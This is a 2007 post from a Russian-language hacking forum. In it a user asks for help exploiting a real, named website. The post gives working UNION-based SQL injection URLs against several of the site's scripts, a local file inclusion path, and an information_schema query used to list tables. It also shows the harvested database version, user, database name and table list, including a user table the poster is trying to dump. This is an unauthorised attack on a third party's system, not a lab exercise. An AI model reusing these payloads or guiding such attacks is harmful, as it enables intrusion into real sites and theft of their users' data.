Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #132  
Старый 13.09.2007, 04:05
of69
Новичок
Регистрация: 02.06.2006
Сообщений: 20
С нами: 10494866

Репутация: 13
По умолчанию
Народ подскажите что делать дальшо (вроде inj и даже inc нашол но нормально ковырнуть неполучаеццо) ...

inj1 _http://www.att.su/obves_kat/index.php?cat=22222+union+select+1,version(),3,4,5 /*&sub_cat=224&p=1'/*

inj2 _http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,database(),u ser(),5/*&p=1'/*

локальный инклуд _http://www.att.su/alessio_wheels/index.php?disk=./../../index

Табличку подобрать никак неполучаеццо.. да и заинклудить чтонить стоящее тоже...

И кста есть ли какойнить софтег/скриптег для автоматического подбора таблиц, а также имеюццо-ли способы узнать имя таблички без перебора?

*добавлено*

Всю ночь я возился с этим сайтом... выдрал все имена таблиц посредствам такой конструкции...
_http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,3,table_name ,5+from+information_schema.tables+limit+73,1/

Но мля, из табличек ничего нечитается... что делать???

http://www.att.su//kengur_kat/index.php?cat=111111+union+select+1,2,column_name, 4,5+from+information_schema.columns+where+table_na me='g2_User'/*
Такой запрос выдаёт "Query failed"

Версия сервака: 5.0.24a-log
Юзер и хост: att_su@localhost
название бд: att_su
Таблички
Код:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
KEN_categories
KEN_detal
KEN_picture
KEN_products
SS_categories
SS_detal
SS_picture
SS_products
SS_subcategories
cesp_expand
cesp_prebuild
g2_AccessMap
g2_AccessSubscriberMap
g2_AlbumItem
g2_AnimationItem
g2_CacheMap
g2_ChildEntity
g2_Comment
g2_DataItem
g2_Derivative
g2_DerivativeImage
g2_DerivativePrefsMap
g2_DescendentCountsMap
g2_Entity
g2_ExternalIdMap
g2_FactoryMap
g2_FailedLoginsMap
g2_FileSystemEntity
g2_Group
g2_ImageBlockCacheMap
g2_ImageBlockDisabledMap
g2_Item
g2_ItemAttributesMap
g2_Lock
g2_MaintenanceMap
g2_MovieItem
g2_PermalinksMap
g2_PermissionSetMap
g2_PhotoItem
g2_PluginMap
g2_PluginPackageMap
g2_PluginParameterMap
g2_RecoverPasswordMap
g2_RssMap
g2_Schema
g2_SequenceId
g2_SequenceLock
g2_SessionMap
g2_TkOperatnMap
g2_TkOperatnMimeTypeMap
g2_TkOperatnParameterMap
g2_TkPropertyMap
g2_TkPropertyMimeTypeMap
g2_UnknownItem
g2_User
g2_UserGroupMap
g2_WatermarkImage
Умные люди, подскажите как можно поступить в такой ситуации?
Последний раз редактировалось of69; 13.09.2007 в 08:05..
 
Ответить с цитированием